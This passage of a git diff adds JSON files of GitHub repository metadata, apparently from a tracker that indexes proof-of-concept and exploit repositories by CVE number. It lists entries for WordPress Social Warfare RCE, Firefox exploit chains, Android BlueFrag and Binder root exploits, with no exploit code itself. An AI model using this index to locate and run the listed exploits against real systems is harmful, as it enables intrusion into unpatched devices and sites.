"public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 265379352, + "name": "Wordpress_CVE-2019-9787", + "full_name": "matinciel\/Wordpress_CVE-2019-9787", + "owner": { + "login": "matinciel", + "id": 39257302, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39257302?v=4", + "html_url": "https:\/\/github.com\/matinciel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/matinciel\/Wordpress_CVE-2019-9787", + "description": "Try to reproduce this issue with Docker", + "fork": false, + "created_at": "2020-05-19T22:09:43Z", + "updated_at": "2024-01-15T11:04:18Z", + "pushed_at": "2020-07-02T07:28:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 381301266, + "name": "CVE-2019-9787", + "full_name": "dexXxed\/CVE-2019-9787", + "owner": { + "login": "dexXxed", + "id": 36333285, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36333285?v=4", + "html_url": "https:\/\/github.com\/dexXxed", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dexXxed\/CVE-2019-9787", + "description": "Overview PoC of CSRF CVE-2019-9787 WordPress Version 5.1.1 ", + "fork": false, + "created_at": "2021-06-29T08:57:43Z", + "updated_at": "2021-06-29T09:15:12Z", + "pushed_at": "2021-06-29T09:15:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 487269926, + "name": "mitigation-cve-2019-9787", + "full_name": "kuangting4231\/mitigation-cve-2019-9787", + "owner": { + "login": "kuangting4231", + "id": 45567559, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45567559?v=4", + "html_url": "https:\/\/github.com\/kuangting4231", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kuangting4231\/mitigation-cve-2019-9787", + "description": null, + "fork": false, + "created_at": "2022-04-30T12:19:50Z", + "updated_at": "2022-04-30T12:19:50Z", + "pushed_at": "2022-04-30T12:44:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-9791.json b/2019/CVE-2019-9791.json new file mode 100644 index 0000000000..ec3913622b --- /dev/null +++ b/2019/CVE-2019-9791.json @@ -0,0 +1,33 @@ +[ + { + "id": 404382733, + "name": "CVE-2019-9791", + "full_name": "Sp0pielar\/CVE-2019-9791", + "owner": { + "login": "Sp0pielar", + "id": 86750660, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86750660?v=4", + "html_url": "https:\/\/github.com\/Sp0pielar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sp0pielar\/CVE-2019-9791", + "description": "Exploit chain for CVE-2019-9791 & CVE-2019-11708 against firefox 65.0 on windows 64bit", + "fork": false, + "created_at": "2021-09-08T14:38:42Z", + "updated_at": "2024-08-13T00:54:04Z", + "pushed_at": "2021-09-08T14:58:11Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-9810.json b/2019/CVE-2019-9810.json new file mode 100644 index 0000000000..6cd0dd4c0f --- /dev/null +++ b/2019/CVE-2019-9810.json @@ -0,0 +1,70 @@ +[ + { + "id": 177500802, + "name": "CVE-2019-9810-PoC", + "full_name": "xuechiyaobai\/CVE-2019-9810-PoC", + "owner": { + "login": "xuechiyaobai", + "id": 8443947, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8443947?v=4", + "html_url": "https:\/\/github.com\/xuechiyaobai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xuechiyaobai\/CVE-2019-9810-PoC", + "description": "Array.prototype.slice wrong alias information.", + "fork": false, + "created_at": "2019-03-25T02:33:18Z", + "updated_at": "2024-08-12T19:47:12Z", + "pushed_at": "2019-03-25T02:41:43Z", + "stargazers_count": 67, + "watchers_count": 67, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 67, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 185060837, + "name": "CVE-2019-9810", + "full_name": "0vercl0k\/CVE-2019-9810", + "owner": { + "login": "0vercl0k", + "id": 1476421, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1476421?v=4", + "html_url": "https:\/\/github.com\/0vercl0k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0vercl0k\/CVE-2019-9810", + "description": "Exploit for CVE-2019-9810 Firefox on Windows 64-bit.", + "fork": false, + "created_at": "2019-05-05T17:19:02Z", + "updated_at": "2024-11-01T02:37:48Z", + "pushed_at": "2019-12-28T18:25:10Z", + "stargazers_count": 227, + "watchers_count": 227, + "has_discussions": false, + "forks_count": 58, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-9810", + "exploit", + "exploitation", + "firefox", + "remote-code-execution" + ], + "visibility": "public", + "forks": 58, + "watchers": 227, + "score": 0, + "subscribers_count": 11 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-9849.json b/2019/CVE-2019-9849.json new file mode 100644 index 0000000000..2b4eca96b9 --- /dev/null +++ b/2019/CVE-2019-9849.json @@ -0,0 +1,40 @@ +[ + { + "id": 819513040, + "name": "CVE-2019-9849", + "full_name": "mbadanoiu\/CVE-2019-9849", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2019-9849", + "description": "CVE-2019-9849: Remote bullet graphics retrieved in “stealth mode” in LibreOffice", + "fork": false, + "created_at": "2024-06-24T16:49:40Z", + "updated_at": "2024-06-24T17:02:55Z", + "pushed_at": "2024-06-24T16:59:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "bypass", + "cve", + "cve-2019-9849", + "cves", + "server-side-request-forgery" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-9896.json b/2019/CVE-2019-9896.json new file mode 100644 index 0000000000..682c074406 --- /dev/null +++ b/2019/CVE-2019-9896.json @@ -0,0 +1,33 @@ +[ + { + "id": 186455638, + "name": "vuln-chm-hijack", + "full_name": "yasinyilmaz\/vuln-chm-hijack", + "owner": { + "login": "yasinyilmaz", + "id": 37842751, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37842751?v=4", + "html_url": "https:\/\/github.com\/yasinyilmaz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yasinyilmaz\/vuln-chm-hijack", + "description": "Potential malicious code execution via CHM hijacking (CVE-2019-9896)", + "fork": false, + "created_at": "2019-05-13T16:17:06Z", + "updated_at": "2024-08-29T01:22:27Z", + "pushed_at": "2019-05-13T16:30:59Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 5, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-9978.json b/2019/CVE-2019-9978.json new file mode 100644 index 0000000000..6910b70f2c --- /dev/null +++ b/2019/CVE-2019-9978.json @@ -0,0 +1,284 @@ +[ + { + "id": 177681155, + "name": "CVE-2019-9978", + "full_name": "mpgn\/CVE-2019-9978", + "owner": { + "login": "mpgn", + "id": 5891788, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5891788?v=4", + "html_url": "https:\/\/github.com\/mpgn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mpgn\/CVE-2019-9978", + "description": "CVE-2019-9978 - RCE on a Wordpress plugin: Social Warfare < 3.5.3", + "fork": false, + "created_at": "2019-03-25T23:38:58Z", + "updated_at": "2024-08-12T19:47:14Z", + "pushed_at": "2019-05-09T13:36:42Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "rce", + "social-warfare" + ], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 184705705, + "name": "CVE-2019-9978", + "full_name": "hash3liZer\/CVE-2019-9978", + "owner": { + "login": "hash3liZer", + "id": 29171692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29171692?v=4", + "html_url": "https:\/\/github.com\/hash3liZer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hash3liZer\/CVE-2019-9978", + "description": "CVE-2019-9978 - (PoC) RCE in Social WarFare Plugin (<=3.5.2)", + "fork": false, + "created_at": "2019-05-03T05:57:44Z", + "updated_at": "2024-08-12T19:48:31Z", + "pushed_at": "2021-06-26T08:28:02Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 18, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 185125359, + "name": "CVE-2019-9978", + "full_name": "KTN1990\/CVE-2019-9978", + "owner": { + "login": "KTN1990", + "id": 33407405, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33407405?v=4", + "html_url": "https:\/\/github.com\/KTN1990", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KTN1990\/CVE-2019-9978", + "description": "Wordpress Social Warfare Remote Code Execution (AUTO UPLOAD SHELL)", + "fork": false, + "created_at": "2019-05-06T04:48:43Z", + "updated_at": "2024-08-12T19:48:37Z", + "pushed_at": "2019-05-07T04:46:20Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 185264593, + "name": "cve-2019-9978", + "full_name": "cved-sources\/cve-2019-9978", + "owner": { + "login": "cved-sources", + "id": 46423677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46423677?v=4", + "html_url": "https:\/\/github.com\/cved-sources", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cved-sources\/cve-2019-9978", + "description": "cve-2019-9978", + "fork": false, + "created_at": "2019-05-06T20:11:20Z", + "updated_at": "2021-04-15T22:57:51Z", + "pushed_at": "2021-04-15T22:57:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 566108053, + "name": "CVE-2019-9978_Exploit", + "full_name": "d3fudd\/CVE-2019-9978_Exploit", + "owner": { + "login": "d3fudd", + "id": 76706456, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76706456?v=4", + "html_url": "https:\/\/github.com\/d3fudd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d3fudd\/CVE-2019-9978_Exploit", + "description": "Social WarFare Plugin (<=3.5.2) Remote Code Execution", + "fork": false, + "created_at": "2022-11-15T01:22:38Z", + "updated_at": "2023-12-05T00:06:39Z", + "pushed_at": "2022-11-15T01:25:55Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 591388946, + "name": "CVE-2019-9978", + "full_name": "grimlockx\/CVE-2019-9978", + "owner": { + "login": "grimlockx", + "id": 95048484, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95048484?v=4", + "html_url": "https:\/\/github.com\/grimlockx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/grimlockx\/CVE-2019-9978", + "description": "Remote Code Execution in Social Warfare Plugin before 3.5.3 for Wordpress.", + "fork": false, + "created_at": "2023-01-20T16:29:18Z", + "updated_at": "2024-03-18T00:55:33Z", + "pushed_at": "2023-02-03T17:02:41Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 680918858, + "name": "CVE-2019-9978-Python3", + "full_name": "h8handles\/CVE-2019-9978-Python3", + "owner": { + "login": "h8handles", + "id": 67421443, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67421443?v=4", + "html_url": "https:\/\/github.com\/h8handles", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h8handles\/CVE-2019-9978-Python3", + "description": "python3 version of the CVE-2019-9978 exploit", + "fork": false, + "created_at": "2023-08-20T20:27:38Z", + "updated_at": "2023-08-20T20:29:12Z", + "pushed_at": "2024-04-06T00:07:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 716387839, + "name": "cve-2019-9978", + "full_name": "0xMoonrise\/cve-2019-9978", + "owner": { + "login": "0xMoonrise", + "id": 48922521, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48922521?v=4", + "html_url": "https:\/\/github.com\/0xMoonrise", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xMoonrise\/cve-2019-9978", + "description": "cve-2019-9978 PoC ", + "fork": false, + "created_at": "2023-11-09T03:01:02Z", + "updated_at": "2023-11-09T03:10:54Z", + "pushed_at": "2023-11-09T03:10:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 860404866, + "name": "CVE-2019-9978", + "full_name": "MAHajian\/CVE-2019-9978", + "owner": { + "login": "MAHajian", + "id": 139576061, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/139576061?v=4", + "html_url": "https:\/\/github.com\/MAHajian", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MAHajian\/CVE-2019-9978", + "description": null, + "fork": false, + "created_at": "2024-09-20T11:25:45Z", + "updated_at": "2024-09-20T13:09:41Z", + "pushed_at": "2024-09-20T13:09:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0001.json b/2020/CVE-2020-0001.json new file mode 100644 index 0000000000..36f7dbf680 --- /dev/null +++ b/2020/CVE-2020-0001.json @@ -0,0 +1,33 @@ +[ + { + "id": 327402400, + "name": "CVE-2020-0001", + "full_name": "Zachinio\/CVE-2020-0001", + "owner": { + "login": "Zachinio", + "id": 16527940, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16527940?v=4", + "html_url": "https:\/\/github.com\/Zachinio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Zachinio\/CVE-2020-0001", + "description": "POC to run system component in an untrusted-app process", + "fork": false, + "created_at": "2021-01-06T18:51:19Z", + "updated_at": "2023-11-10T10:21:52Z", + "pushed_at": "2021-05-17T08:10:40Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0014.json b/2020/CVE-2020-0014.json new file mode 100644 index 0000000000..71382d517e --- /dev/null +++ b/2020/CVE-2020-0014.json @@ -0,0 +1,33 @@ +[ + { + "id": 292801316, + "name": "CVE-2020-0014-Toast", + "full_name": "tea9\/CVE-2020-0014-Toast", + "owner": { + "login": "tea9", + "id": 39117901, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39117901?v=4", + "html_url": "https:\/\/github.com\/tea9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tea9\/CVE-2020-0014-Toast", + "description": "CVE-2020-0014-Toast-复现", + "fork": false, + "created_at": "2020-09-04T09:02:29Z", + "updated_at": "2024-11-19T01:11:36Z", + "pushed_at": "2020-09-07T06:34:42Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 7, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0022.json b/2020/CVE-2020-0022.json new file mode 100644 index 0000000000..8845cdbf1c --- /dev/null +++ b/2020/CVE-2020-0022.json @@ -0,0 +1,234 @@ +[ + { + "id": 240753059, + "name": "cve-2020-0022", + "full_name": "leommxj\/cve-2020-0022", + "owner": { + "login": "leommxj", + "id": 11194599, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11194599?v=4", + "html_url": "https:\/\/github.com\/leommxj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/leommxj\/cve-2020-0022", + "description": "poc for cve-2020-0022", + "fork": false, + "created_at": "2020-02-15T16:55:44Z", + "updated_at": "2024-08-27T14:24:42Z", + "pushed_at": "2020-07-16T06:51:16Z", + "stargazers_count": 65, + "watchers_count": 65, + "has_discussions": false, + "forks_count": 29, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 29, + "watchers": 65, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 276237731, + "name": "Bluefrag_CVE-2020-0022", + "full_name": "k3vinlusec\/Bluefrag_CVE-2020-0022", + "owner": { + "login": "k3vinlusec", + "id": 19988136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19988136?v=4", + "html_url": "https:\/\/github.com\/k3vinlusec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k3vinlusec\/Bluefrag_CVE-2020-0022", + "description": "This is a RCE bluetooth vulnerability on Android 8.0 and 9.0", + "fork": false, + "created_at": "2020-07-01T00:23:33Z", + "updated_at": "2024-08-19T09:57:02Z", + "pushed_at": "2023-05-23T04:46:45Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 20, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 290022016, + "name": "CVE-2020-0022", + "full_name": "Polo35\/CVE-2020-0022", + "owner": { + "login": "Polo35", + "id": 489662, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/489662?v=4", + "html_url": "https:\/\/github.com\/Polo35", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Polo35\/CVE-2020-0022", + "description": "CVE-2020-0022 vulnerability exploitation on Bouygues BBox Miami (Android TV 8.0 - ARM32 Cortex A9)", + "fork": false, + "created_at": "2020-08-24T19:33:10Z", + "updated_at": "2024-02-23T06:11:25Z", + "pushed_at": "2021-03-21T20:59:46Z", + "stargazers_count": 33, + "watchers_count": 33, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 33, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 321889394, + "name": "cve-2020-0022", + "full_name": "5k1l\/cve-2020-0022", + "owner": { + "login": "5k1l", + "id": 51367843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51367843?v=4", + "html_url": "https:\/\/github.com\/5k1l", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/5k1l\/cve-2020-0022", + "description": "cve-2020-0022相关的一些东西", + "fork": false, + "created_at": "2020-12-16T06:25:41Z", + "updated_at": "2022-08-24T08:17:30Z", + "pushed_at": "2020-12-16T07:17:45Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 341906494, + "name": "CVE-2020-0022", + "full_name": "lsw29475\/CVE-2020-0022", + "owner": { + "login": "lsw29475", + "id": 13043359, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13043359?v=4", + "html_url": "https:\/\/github.com\/lsw29475", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lsw29475\/CVE-2020-0022", + "description": null, + "fork": false, + "created_at": "2021-02-24T13:17:41Z", + "updated_at": "2023-08-14T16:40:49Z", + "pushed_at": "2021-02-24T13:18:25Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 424285995, + "name": "poc-for-cve-2020-0022", + "full_name": "devdanqtuan\/poc-for-cve-2020-0022", + "owner": { + "login": "devdanqtuan", + "id": 88175750, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88175750?v=4", + "html_url": "https:\/\/github.com\/devdanqtuan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/devdanqtuan\/poc-for-cve-2020-0022", + "description": "cve-2020-0022", + "fork": false, + "created_at": "2021-11-03T15:48:53Z", + "updated_at": "2021-11-03T15:50:17Z", + "pushed_at": "2021-11-03T15:50:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 684016565, + "name": "CVE-2020-0022", + "full_name": "themmokhtar\/CVE-2020-0022", + "owner": { + "login": "themmokhtar", + "id": 143679154, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143679154?v=4", + "html_url": "https:\/\/github.com\/themmokhtar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/themmokhtar\/CVE-2020-0022", + "description": "A fully public exploit of the CVE-2020-0022 BlueFrag Android RCE Vulnerability (tested on Pixel 3 XL)", + "fork": false, + "created_at": "2023-08-28T09:20:38Z", + "updated_at": "2024-05-02T10:13:20Z", + "pushed_at": "2023-11-21T13:32:01Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "aarch64", + "android", + "arm64", + "attack", + "bluetooth", + "bluetooth-low-energy", + "bluez", + "exploit", + "exploitation", + "rce", + "rce-exploit", + "research", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 5, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0023.json b/2020/CVE-2020-0023.json new file mode 100644 index 0000000000..ccac61681f --- /dev/null +++ b/2020/CVE-2020-0023.json @@ -0,0 +1,33 @@ +[ + { + "id": 242545703, + "name": "CVE-2020-0023", + "full_name": "362902755\/CVE-2020-0023", + "owner": { + "login": "362902755", + "id": 58105568, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58105568?v=4", + "html_url": "https:\/\/github.com\/362902755", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/362902755\/CVE-2020-0023", + "description": "BlueFrag experiments", + "fork": false, + "created_at": "2020-02-23T15:53:52Z", + "updated_at": "2020-02-23T15:53:55Z", + "pushed_at": "2020-02-19T20:25:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0041.json b/2020/CVE-2020-0041.json new file mode 100644 index 0000000000..ab66c25ed3 --- /dev/null +++ b/2020/CVE-2020-0041.json @@ -0,0 +1,157 @@ +[ + { + "id": 251686385, + "name": "CVE-2020-0041", + "full_name": "bluefrostsecurity\/CVE-2020-0041", + "owner": { + "login": "bluefrostsecurity", + "id": 4976074, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4976074?v=4", + "html_url": "https:\/\/github.com\/bluefrostsecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bluefrostsecurity\/CVE-2020-0041", + "description": "Exploits for Android Binder bug CVE-2020-0041", + "fork": false, + "created_at": "2020-03-31T17:53:57Z", + "updated_at": "2024-11-16T02:51:17Z", + "pushed_at": "2020-04-08T08:55:30Z", + "stargazers_count": 221, + "watchers_count": 221, + "has_discussions": false, + "forks_count": 68, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 68, + "watchers": 221, + "score": 0, + "subscribers_count": 11 + }, + { + "id": 286583220, + "name": "CVE-2020-0041", + "full_name": "j4nn\/CVE-2020-0041", + "owner": { + "login": "j4nn", + "id": 531585, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/531585?v=4", + "html_url": "https:\/\/github.com\/j4nn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/j4nn\/CVE-2020-0041", + "description": null, + "fork": false, + "created_at": "2020-08-10T21:34:16Z", + "updated_at": "2024-08-08T04:22:28Z", + "pushed_at": "2022-05-03T09:22:01Z", + "stargazers_count": 49, + "watchers_count": 49, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 22, + "watchers": 49, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 405003119, + "name": "CVE-2020-0041", + "full_name": "koharin\/CVE-2020-0041", + "owner": { + "login": "koharin", + "id": 35914056, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35914056?v=4", + "html_url": "https:\/\/github.com\/koharin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/koharin\/CVE-2020-0041", + "description": null, + "fork": false, + "created_at": "2021-09-10T08:01:54Z", + "updated_at": "2022-08-03T02:28:03Z", + "pushed_at": "2021-10-15T08:10:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 678197171, + "name": "CVE-2020-0041-Pixel-3a", + "full_name": "vaginessa\/CVE-2020-0041-Pixel-3a", + "owner": { + "login": "vaginessa", + "id": 7347813, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7347813?v=4", + "html_url": "https:\/\/github.com\/vaginessa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vaginessa\/CVE-2020-0041-Pixel-3a", + "description": "Local privilege escalation exploit for Android Binder bug CVE-2020-0041 (Pixel 3a)", + "fork": false, + "created_at": "2023-08-14T01:46:47Z", + "updated_at": "2024-07-18T20:18:51Z", + "pushed_at": "2021-04-15T11:06:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 684778175, + "name": "root-exploit-pixel3", + "full_name": "jcalabres\/root-exploit-pixel3", + "owner": { + "login": "jcalabres", + "id": 20535054, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20535054?v=4", + "html_url": "https:\/\/github.com\/jcalabres", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jcalabres\/root-exploit-pixel3", + "description": "Adapted CVE-2020-0041 root exploit for Pixel 3", + "fork": false, + "created_at": "2023-08-29T20:48:56Z", + "updated_at": "2024-08-06T15:58:55Z", + "pushed_at": "2023-08-29T20:50:29Z", + "stargazers_count": 